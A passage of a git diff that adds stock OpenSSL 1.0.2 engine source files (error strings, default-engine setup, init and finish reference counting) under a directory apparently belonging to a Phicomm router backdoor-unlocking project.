+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+/*
+ * NOTE: this file was auto generated by the mkerr.pl script: any changes
+ * made to it will be overwritten when the script next updates this file,
+ * only reason strings will be preserved.
+ */
+
+#include <stdio.h>
+#include <openssl/err.h>
+#include <openssl/engine.h>
+
+/* BEGIN ERROR CODES */
+#ifndef OPENSSL_NO_ERR
+
+# define ERR_FUNC(func) ERR_PACK(ERR_LIB_ENGINE,func,0)
+# define ERR_REASON(reason) ERR_PACK(ERR_LIB_ENGINE,0,reason)
+
+static ERR_STRING_DATA ENGINE_str_functs[] = {
+    {ERR_FUNC(ENGINE_F_DYNAMIC_CTRL), "DYNAMIC_CTRL"},
+    {ERR_FUNC(ENGINE_F_DYNAMIC_GET_DATA_CTX), "DYNAMIC_GET_DATA_CTX"},
+    {ERR_FUNC(ENGINE_F_DYNAMIC_LOAD), "DYNAMIC_LOAD"},
+    {ERR_FUNC(ENGINE_F_DYNAMIC_SET_DATA_CTX), "DYNAMIC_SET_DATA_CTX"},
+    {ERR_FUNC(ENGINE_F_ENGINE_ADD), "ENGINE_add"},
+    {ERR_FUNC(ENGINE_F_ENGINE_BY_ID), "ENGINE_by_id"},
+    {ERR_FUNC(ENGINE_F_ENGINE_CMD_IS_EXECUTABLE), "ENGINE_cmd_is_executable"},
+    {ERR_FUNC(ENGINE_F_ENGINE_CTRL), "ENGINE_ctrl"},
+    {ERR_FUNC(ENGINE_F_ENGINE_CTRL_CMD), "ENGINE_ctrl_cmd"},
+    {ERR_FUNC(ENGINE_F_ENGINE_CTRL_CMD_STRING), "ENGINE_ctrl_cmd_string"},
+    {ERR_FUNC(ENGINE_F_ENGINE_FINISH), "ENGINE_finish"},
+    {ERR_FUNC(ENGINE_F_ENGINE_FREE_UTIL), "ENGINE_FREE_UTIL"},
+    {ERR_FUNC(ENGINE_F_ENGINE_GET_CIPHER), "ENGINE_get_cipher"},
+    {ERR_FUNC(ENGINE_F_ENGINE_GET_DEFAULT_TYPE), "ENGINE_GET_DEFAULT_TYPE"},
+    {ERR_FUNC(ENGINE_F_ENGINE_GET_DIGEST), "ENGINE_get_digest"},
+    {ERR_FUNC(ENGINE_F_ENGINE_GET_NEXT), "ENGINE_get_next"},
+    {ERR_FUNC(ENGINE_F_ENGINE_GET_PKEY_ASN1_METH),
+     "ENGINE_get_pkey_asn1_meth"},
+    {ERR_FUNC(ENGINE_F_ENGINE_GET_PKEY_METH), "ENGINE_get_pkey_meth"},
+    {ERR_FUNC(ENGINE_F_ENGINE_GET_PREV), "ENGINE_get_prev"},
+    {ERR_FUNC(ENGINE_F_ENGINE_INIT), "ENGINE_init"},
+    {ERR_FUNC(ENGINE_F_ENGINE_LIST_ADD), "ENGINE_LIST_ADD"},
+    {ERR_FUNC(ENGINE_F_ENGINE_LIST_REMOVE), "ENGINE_LIST_REMOVE"},
+    {ERR_FUNC(ENGINE_F_ENGINE_LOAD_PRIVATE_KEY), "ENGINE_load_private_key"},
+    {ERR_FUNC(ENGINE_F_ENGINE_LOAD_PUBLIC_KEY), "ENGINE_load_public_key"},
+    {ERR_FUNC(ENGINE_F_ENGINE_LOAD_SSL_CLIENT_CERT),
+     "ENGINE_load_ssl_client_cert"},
+    {ERR_FUNC(ENGINE_F_ENGINE_NEW), "ENGINE_new"},
+    {ERR_FUNC(ENGINE_F_ENGINE_REMOVE), "ENGINE_remove"},
+    {ERR_FUNC(ENGINE_F_ENGINE_SET_DEFAULT_STRING),
+     "ENGINE_set_default_string"},
+    {ERR_FUNC(ENGINE_F_ENGINE_SET_DEFAULT_TYPE), "ENGINE_SET_DEFAULT_TYPE"},
+    {ERR_FUNC(ENGINE_F_ENGINE_SET_ID), "ENGINE_set_id"},
+    {ERR_FUNC(ENGINE_F_ENGINE_SET_NAME), "ENGINE_set_name"},
+    {ERR_FUNC(ENGINE_F_ENGINE_TABLE_REGISTER), "ENGINE_TABLE_REGISTER"},
+    {ERR_FUNC(ENGINE_F_ENGINE_UNLOAD_KEY), "ENGINE_UNLOAD_KEY"},
+    {ERR_FUNC(ENGINE_F_ENGINE_UNLOCKED_FINISH), "ENGINE_UNLOCKED_FINISH"},
+    {ERR_FUNC(ENGINE_F_ENGINE_UP_REF), "ENGINE_up_ref"},
+    {ERR_FUNC(ENGINE_F_INT_CTRL_HELPER), "INT_CTRL_HELPER"},
+    {ERR_FUNC(ENGINE_F_INT_ENGINE_CONFIGURE), "INT_ENGINE_CONFIGURE"},
+    {ERR_FUNC(ENGINE_F_INT_ENGINE_MODULE_INIT), "INT_ENGINE_MODULE_INIT"},
+    {ERR_FUNC(ENGINE_F_LOG_MESSAGE), "LOG_MESSAGE"},
+    {0, NULL}
+};
+
+static ERR_STRING_DATA ENGINE_str_reasons[] = {
+    {ERR_REASON(ENGINE_R_ALREADY_LOADED), "already loaded"},
+    {ERR_REASON(ENGINE_R_ARGUMENT_IS_NOT_A_NUMBER),
+     "argument is not a number"},
+    {ERR_REASON(ENGINE_R_CMD_NOT_EXECUTABLE), "cmd not executable"},
+    {ERR_REASON(ENGINE_R_COMMAND_TAKES_INPUT), "command takes input"},
+    {ERR_REASON(ENGINE_R_COMMAND_TAKES_NO_INPUT), "command takes no input"},
+    {ERR_REASON(ENGINE_R_CONFLICTING_ENGINE_ID), "conflicting engine id"},
+    {ERR_REASON(ENGINE_R_CTRL_COMMAND_NOT_IMPLEMENTED),
+     "ctrl command not implemented"},
+    {ERR_REASON(ENGINE_R_DH_NOT_IMPLEMENTED), "dh not implemented"},
+    {ERR_REASON(ENGINE_R_DSA_NOT_IMPLEMENTED), "dsa not implemented"},
+    {ERR_REASON(ENGINE_R_DSO_FAILURE), "DSO failure"},
+    {ERR_REASON(ENGINE_R_DSO_NOT_FOUND), "dso not found"},
+    {ERR_REASON(ENGINE_R_ENGINES_SECTION_ERROR), "engines section error"},
+    {ERR_REASON(ENGINE_R_ENGINE_CONFIGURATION_ERROR),
+     "engine configuration error"},
+    {ERR_REASON(ENGINE_R_ENGINE_IS_NOT_IN_LIST), "engine is not in the list"},
+    {ERR_REASON(ENGINE_R_ENGINE_SECTION_ERROR), "engine section error"},
+    {ERR_REASON(ENGINE_R_FAILED_LOADING_PRIVATE_KEY),
+     "failed loading private key"},
+    {ERR_REASON(ENGINE_R_FAILED_LOADING_PUBLIC_KEY),
+     "failed loading public key"},
+    {ERR_REASON(ENGINE_R_FINISH_FAILED), "finish failed"},
+    {ERR_REASON(ENGINE_R_GET_HANDLE_FAILED),
+     "could not obtain hardware handle"},
+    {ERR_REASON(ENGINE_R_ID_OR_NAME_MISSING), "'id' or 'name' missing"},
+    {ERR_REASON(ENGINE_R_INIT_FAILED), "init failed"},
+    {ERR_REASON(ENGINE_R_INTERNAL_LIST_ERROR), "internal list error"},
+    {ERR_REASON(ENGINE_R_INVALID_ARGUMENT), "invalid argument"},
+    {ERR_REASON(ENGINE_R_INVALID_CMD_NAME), "invalid cmd name"},
+    {ERR_REASON(ENGINE_R_INVALID_CMD_NUMBER), "invalid cmd number"},
+    {ERR_REASON(ENGINE_R_INVALID_INIT_VALUE), "invalid init value"},
+    {ERR_REASON(ENGINE_R_INVALID_STRING), "invalid string"},
+    {ERR_REASON(ENGINE_R_NOT_INITIALISED), "not initialised"},
+    {ERR_REASON(ENGINE_R_NOT_LOADED), "not loaded"},
+    {ERR_REASON(ENGINE_R_NO_CONTROL_FUNCTION), "no control function"},
+    {ERR_REASON(ENGINE_R_NO_INDEX), "no index"},
+    {ERR_REASON(ENGINE_R_NO_LOAD_FUNCTION), "no load function"},
+    {ERR_REASON(ENGINE_R_NO_REFERENCE), "no reference"},
+    {ERR_REASON(ENGINE_R_NO_SUCH_ENGINE), "no such engine"},
+    {ERR_REASON(ENGINE_R_NO_UNLOAD_FUNCTION), "no unload function"},
+    {ERR_REASON(ENGINE_R_PROVIDE_PARAMETERS), "provide parameters"},
+    {ERR_REASON(ENGINE_R_RSA_NOT_IMPLEMENTED), "rsa not implemented"},
+    {ERR_REASON(ENGINE_R_UNIMPLEMENTED_CIPHER), "unimplemented cipher"},
+    {ERR_REASON(ENGINE_R_UNIMPLEMENTED_DIGEST), "unimplemented digest"},
+    {ERR_REASON(ENGINE_R_UNIMPLEMENTED_PUBLIC_KEY_METHOD),
+     "unimplemented public key method"},
+    {ERR_REASON(ENGINE_R_VERSION_INCOMPATIBILITY), "version incompatibility"},
+    {0, NULL}
+};
+
+#endif
+
+void ERR_load_ENGINE_strings(void)
+{
+#ifndef OPENSSL_NO_ERR
+
+    if (ERR_func_error_string(ENGINE_str_functs[0].error) == NULL) {
+        ERR_load_strings(0, ENGINE_str_functs);
+        ERR_load_strings(0, ENGINE_str_reasons);
+    }
+#endif
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/eng_fat.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/eng_fat.c
new file mode 100644
index 0000000..bcb4c44
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/eng_fat.c
@@ -0,0 +1,179 @@
+/* crypto/engine/eng_fat.c */
+/* ====================================================================
+ * Copyright (c) 1999-2001 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+/* ====================================================================
+ * Copyright 2002 Sun Microsystems, Inc. ALL RIGHTS RESERVED.
+ * ECDH support in OpenSSL originally developed by
+ * SUN MICROSYSTEMS, INC., and contributed to the OpenSSL project.
+ */
+
+#include "eng_int.h"
+#include <openssl/conf.h>
+
+int ENGINE_set_default(ENGINE *e, unsigned int flags)
+{
+    if ((flags & ENGINE_METHOD_CIPHERS) && !ENGINE_set_default_ciphers(e))
+        return 0;
+    if ((flags & ENGINE_METHOD_DIGESTS) && !ENGINE_set_default_digests(e))
+        return 0;
+#ifndef OPENSSL_NO_RSA
+    if ((flags & ENGINE_METHOD_RSA) && !ENGINE_set_default_RSA(e))
+        return 0;
+#endif
+#ifndef OPENSSL_NO_DSA
+    if ((flags & ENGINE_METHOD_DSA) && !ENGINE_set_default_DSA(e))
+        return 0;
+#endif
+#ifndef OPENSSL_NO_DH
+    if ((flags & ENGINE_METHOD_DH) && !ENGINE_set_default_DH(e))
+        return 0;
+#endif
+#ifndef OPENSSL_NO_ECDH
+    if ((flags & ENGINE_METHOD_ECDH) && !ENGINE_set_default_ECDH(e))
+        return 0;
+#endif
+#ifndef OPENSSL_NO_ECDSA
+    if ((flags & ENGINE_METHOD_ECDSA) && !ENGINE_set_default_ECDSA(e))
+        return 0;
+#endif
+    if ((flags & ENGINE_METHOD_RAND) && !ENGINE_set_default_RAND(e))
+        return 0;
+    if ((flags & ENGINE_METHOD_PKEY_METHS)
+        && !ENGINE_set_default_pkey_meths(e))
+        return 0;
+    if ((flags & ENGINE_METHOD_PKEY_ASN1_METHS)
+        && !ENGINE_set_default_pkey_asn1_meths(e))
+        return 0;
+    return 1;
+}
+
+/* Set default algorithms using a string */
+
+static int int_def_cb(const char *alg, int len, void *arg)
+{
+    unsigned int *pflags = arg;
+    if (!strncmp(alg, "ALL", len))
+        *pflags |= ENGINE_METHOD_ALL;
+    else if (!strncmp(alg, "RSA", len))
+        *pflags |= ENGINE_METHOD_RSA;
+    else if (!strncmp(alg, "DSA", len))
+        *pflags |= ENGINE_METHOD_DSA;
+    else if (!strncmp(alg, "ECDH", len))
+        *pflags |= ENGINE_METHOD_ECDH;
+    else if (!strncmp(alg, "ECDSA", len))
+        *pflags |= ENGINE_METHOD_ECDSA;
+    else if (!strncmp(alg, "DH", len))
+        *pflags |= ENGINE_METHOD_DH;
+    else if (!strncmp(alg, "RAND", len))
+        *pflags |= ENGINE_METHOD_RAND;
+    else if (!strncmp(alg, "CIPHERS", len))
+        *pflags |= ENGINE_METHOD_CIPHERS;
+    else if (!strncmp(alg, "DIGESTS", len))
+        *pflags |= ENGINE_METHOD_DIGESTS;
+    else if (!strncmp(alg, "PKEY", len))
+        *pflags |= ENGINE_METHOD_PKEY_METHS | ENGINE_METHOD_PKEY_ASN1_METHS;
+    else if (!strncmp(alg, "PKEY_CRYPTO", len))
+        *pflags |= ENGINE_METHOD_PKEY_METHS;
+    else if (!strncmp(alg, "PKEY_ASN1", len))
+        *pflags |= ENGINE_METHOD_PKEY_ASN1_METHS;
+    else
+        return 0;
+    return 1;
+}
+
+int ENGINE_set_default_string(ENGINE *e, const char *def_list)
+{
+    unsigned int flags = 0;
+    if (!CONF_parse_list(def_list, ',', 1, int_def_cb, &flags)) {
+        ENGINEerr(ENGINE_F_ENGINE_SET_DEFAULT_STRING,
+                  ENGINE_R_INVALID_STRING);
+        ERR_add_error_data(2, "str=", def_list);
+        return 0;
+    }
+    return ENGINE_set_default(e, flags);
+}
+
+int ENGINE_register_complete(ENGINE *e)
+{
+    ENGINE_register_ciphers(e);
+    ENGINE_register_digests(e);
+#ifndef OPENSSL_NO_RSA
+    ENGINE_register_RSA(e);
+#endif
+#ifndef OPENSSL_NO_DSA
+    ENGINE_register_DSA(e);
+#endif
+#ifndef OPENSSL_NO_DH
+    ENGINE_register_DH(e);
+#endif
+#ifndef OPENSSL_NO_ECDH
+    ENGINE_register_ECDH(e);
+#endif
+#ifndef OPENSSL_NO_ECDSA
+    ENGINE_register_ECDSA(e);
+#endif
+    ENGINE_register_RAND(e);
+    ENGINE_register_pkey_meths(e);
+    return 1;
+}
+
+int ENGINE_register_all_complete(void)
+{
+    ENGINE *e;
+
+    for (e = ENGINE_get_first(); e; e = ENGINE_get_next(e))
+        if (!(e->flags & ENGINE_FLAGS_NO_REGISTER_ALL))
+            ENGINE_register_complete(e);
+    return 1;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/eng_init.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/eng_init.c
new file mode 100644
index 0000000..4ea7fe6
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/eng_init.c
@@ -0,0 +1,157 @@
+/* crypto/engine/eng_init.c */
+/* ====================================================================
+ * Copyright (c) 1999-2001 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include "eng_int.h"
+
+/*
+ * Initialise a engine type for use (or up its functional reference count if
+ * it's already in use). This version is only used internally.
+ */
+int engine_unlocked_init(ENGINE *e)
+{
+    int to_return = 1;
+
+    if ((e->funct_ref == 0) && e->init)
+        /*
+         * This is the first functional reference and the engine requires
+         * initialisation so we do it now.
+         */
+        to_return = e->init(e);
+    if (to_return) {
+        /*
+         * OK, we return a functional reference which is also a structural
+         * reference.
+         */
+        e->struct_ref++;
+        e->funct_ref++;
+        engine_ref_debug(e, 0, 1)
+            engine_ref_debug(e, 1, 1)
+    }
+    return to_return;
+}
+
+/*
+ * Free a functional reference to a engine type. This version is only used
+ * internally.
+ */
+int engine_unlocked_finish(ENGINE *e, int unlock_for_handlers)
+{
+    int to_return = 1;
+
+    /*
+     * Reduce the functional reference count here so if it's the terminating
+     * case, we can release the lock safely and call the finish() handler
+     * without risk of a race. We get a race if we leave the count until
+     * after and something else is calling "finish" at the same time -
+     * there's a chance that both threads will together take the count from 2
+     * to 0 without either calling finish().
+     */
+    e->funct_ref--;
+    engine_ref_debug(e, 1, -1);
+    if ((e->funct_ref == 0) && e->finish) {
+        if (unlock_for_handlers)
+            CRYPTO_w_unlock(CRYPTO_LOCK_ENGINE);
+        to_return = e->finish(e);
+        if (unlock_for_handlers)
+            CRYPTO_w_lock(CRYPTO_LOCK_ENGINE);
+        if (!to_return)
+            return 0;
+    }
+#ifdef REF_CHECK
+    if (e->funct_ref < 0) {
+        fprintf(stderr, "ENGINE_finish, bad functional reference count\n");
+        abort();
+    }
+#endif
+    /* Release the structural reference too */
+    if (!engine_free_util(e, 0)) {
+        ENGINEerr(ENGINE_F_ENGINE_UNLOCKED_FINISH, ENGINE_R_FINISH_FAILED);
+        return 0;
+    }
+    return to_return;
+}
+
+/* The API (locked) version of "init" */
+int ENGINE_init(ENGINE *e)
+{
+    int ret;
+    if (e == NULL) {
+        ENGINEerr(ENGINE_F_ENGINE_INIT, ERR_R_PASSED_NULL_PARAMETER);
+        return 0;
+    }
+    CRYPTO_w_lock(CRYPTO_LOCK_ENGINE);
+    ret = engine_unlocked_init(e);
+    CRYPTO_w_unlock(CRYPTO_LOCK_ENGINE);
+    return ret;
+}
+
+/* The API (locked) version of "finish" */
+int ENGINE_finish(ENGINE *e)
+{
+    int to_return = 1;
+
+    if (e == NULL) {
+        ENGINEerr(ENGINE_F_ENGINE_FINISH, ERR_R_PASSED_NULL_PARAMETER);
+        return 0;
+    }
+    CRYPTO_w_lock(CRYPTO_LOCK_ENGINE);
+    to_return = engine_unlocked_finish(e, 1);
+    CRYPTO_w_unlock(CRYPTO_LOCK_ENGINE);
+    if (!to_return) {
+        ENGINEerr(ENGINE_F_ENGINE_FINISH, ENGINE_R_FINISH_FAILED);
+        return 0;
+    }
+    return to_return;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/eng_int.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/eng_int.h
new file mode 100644
index 0000000..46f163b
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/eng_int.h
@@ -0,0 +1,224 @@
+/* crypto/engine/eng_int.h */
+/*
+ * Written by Geoff Thorpe (geoff@geoffthorpe.net) for the OpenSSL project
+ * 2000.
+ */
+/* ====================================================================
+ * Copyright (c) 1999-2001 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+/* ====================================================================
+ * Copyright 2002 Sun Microsystems, Inc. ALL RIGHTS RESERVED.
+ * ECDH support in OpenSSL originally developed by
+ * SUN MICROSYSTEMS, INC., and contributed to the OpenSSL project.
+ */
+
+#ifndef HEADER_ENGINE_INT_H
+# define HEADER_ENGINE_INT_H
+
+# include "cryptlib.h"
+/* Take public definitions from engine.h */
+# include <openssl/engine.h>
+
+#ifdef  __cplusplus
+extern "C" {
+#endif
+
+/*
+ * If we compile with this symbol defined, then both reference counts in the
+ * ENGINE structure will be monitored with a line of output on stderr for
+ * each change. This prints the engine's pointer address (truncated to
+ * unsigned int), "struct" or "funct" to indicate the reference type, the
+ * before and after reference count, and the file:line-number pair. The
+ * "engine_ref_debug" statements must come *after* the change.
+ */
+# ifdef ENGINE_REF_COUNT_DEBUG
+
+#  define engine_ref_debug(e, isfunct, diff) \
+        fprintf(stderr, "engine: %08x %s from %d to %d (%s:%d)\n", \
+                (unsigned int)(e), (isfunct ? "funct" : "struct"), \
+                ((isfunct) ? ((e)->funct_ref - (diff)) : ((e)->struct_ref - (diff))), \
+                ((isfunct) ? (e)->funct_ref : (e)->struct_ref), \
+                (__FILE__), (__LINE__));
+
+# else
+
+#  define engine_ref_debug(e, isfunct, diff)
+
+# endif
+
+/*
+ * Any code that will need cleanup operations should use these functions to
+ * register callbacks. ENGINE_cleanup() will call all registered callbacks in
+ * order. NB: both the "add" functions assume CRYPTO_LOCK_ENGINE to already be
+ * held (in "write" mode).
+ */
+typedef void (ENGINE_CLEANUP_CB) (void);
+typedef struct st_engine_cleanup_item {
+    ENGINE_CLEANUP_CB *cb;
+} ENGINE_CLEANUP_ITEM;
+DECLARE_STACK_OF(ENGINE_CLEANUP_ITEM)
+void engine_cleanup_add_first(ENGINE_CLEANUP_CB *cb);
+void engine_cleanup_add_last(ENGINE_CLEANUP_CB *cb);
+
+/* We need stacks of ENGINEs for use in eng_table.c */
+DECLARE_STACK_OF(ENGINE)
+
+/*
+ * If this symbol is defined then engine_table_select(), the function that is
+ * used by RSA, DSA (etc) code to select registered ENGINEs, cache defaults
+ * and functional references (etc), will display debugging summaries to
+ * stderr.
+ */
+/* #define ENGINE_TABLE_DEBUG */
+
+/*
+ * This represents an implementation table. Dependent code should instantiate
+ * it as a (ENGINE_TABLE *) pointer value set initially to NULL.
+ */
+typedef struct st_engine_table ENGINE_TABLE;
+int engine_table_register(ENGINE_TABLE **table, ENGINE_CLEANUP_CB *cleanup,
+                          ENGINE *e, const int *nids, int num_nids,
+                          int setdefault);
+void engine_table_unregister(ENGINE_TABLE **table, ENGINE *e);
+void engine_table_cleanup(ENGINE_TABLE **table);
+# ifndef ENGINE_TABLE_DEBUG
+ENGINE *engine_table_select(ENGINE_TABLE **table, int nid);
+# else
+ENGINE *engine_table_select_tmp(ENGINE_TABLE **table, int nid, const char *f,
+                                int l);
+#  define engine_table_select(t,n) engine_table_select_tmp(t,n,__FILE__,__LINE__)
+# endif
+typedef void (engine_table_doall_cb) (int nid, STACK_OF(ENGINE) *sk,
+                                      ENGINE *def, void *arg);
+void engine_table_doall(ENGINE_TABLE *table, engine_table_doall_cb *cb,
+                        void *arg);
+
+/*
+ * Internal versions of API functions that have control over locking. These
+ * are used between C files when functionality needs to be shared but the
+ * caller may already be controlling of the CRYPTO_LOCK_ENGINE lock.
+ */
+int engine_unlocked_init(ENGINE *e);
